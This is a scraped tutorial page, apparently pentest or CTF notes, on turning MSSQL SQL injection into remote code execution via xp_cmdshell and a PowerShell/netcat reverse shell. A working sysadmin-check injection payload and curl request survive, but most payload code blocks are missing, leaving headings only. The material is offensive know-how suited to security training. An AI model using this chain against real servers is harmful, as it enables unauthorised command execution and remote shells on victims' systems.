Remote Code Execution
Overview
If running as sa user or with sufficient permissions, MSSQL can execute arbitrary system commands via xp_cmdshell.
Step 1: Verify Permissions
Check sysadmin Role
IS_SRVROLEMEMBER('sysadmin')Returns:
1= Has sysadmin role0= Does not have role
SQLi Payload
maria' AND IS_SRVROLEMEMBER('sysadmin')=1;--Response: taken = We have sysadmin! β
Using cURL
# URL encode
printf %s "maria' AND IS_SRVROLEMEMBER('sysadmin')=1;--" | jq -rR @uri
# Send request
curl -s "http://<TARGET>/api/check-username.php?u=maria'%20AND%20IS_SRVROLEMEMBER('sysadmin')%3D1%3B--"Step 2: Enable xp_cmdshell
Enable Advanced Options First
SQLi Payload:
Enable xp_cmdshell
SQLi Payload:
Step 3: Test Command Execution
Ping Test
SQLi Payload:
Verify with tcpdump
Expected Output:
4 ICMP pairs = xp_cmdshell working! β
Step 4: Get Reverse Shell
PowerShell Payload
Encode Payload (Base64 UTF-16LE)
Output: KABuAGUAdwAtAG8AYgBqAGUAYwB0AC...
Final SQLi Payload
Attack Setup
1. Download nc.exe
2. Start HTTP Server
3. Start Netcat Listener
4. Send Payload
5. Receive Shell
Complete Attack Chain
URL Encoding Helper
PowerShell Encoding
Why Encode?
Avoid quotation mark issues
Bypass basic filters
Cleaner payload delivery
Encoding Steps
Write PowerShell command
Convert to UTF-16LE
Base64 encode
Use with
-encflag
One-liner Template
Alternative: Raikia's Hub
Online encoder (may be offline): https://raikia.com/tool-powershell-encoder/
xp_cmdshell Reference
Default Execution Context
Commands run as: nt service\mssqlserver
Alternative Shells
Troubleshooting
xp_cmdshell Not Working
Verify sysadmin role
Check if advanced options enabled
Try different xp_cmdshell syntax
Check firewall/network connectivity
Reverse Shell Not Connecting
Verify ports are open
Check if nc.exe downloaded
Try different payload encoding
Use alternative reverse shell methods
Permission Denied
May need different user context
Try proxy account configuration
Escalate privileges first
Quick Reference
Enable xp_cmdshell
Execute Command
Check Permissions
Last updated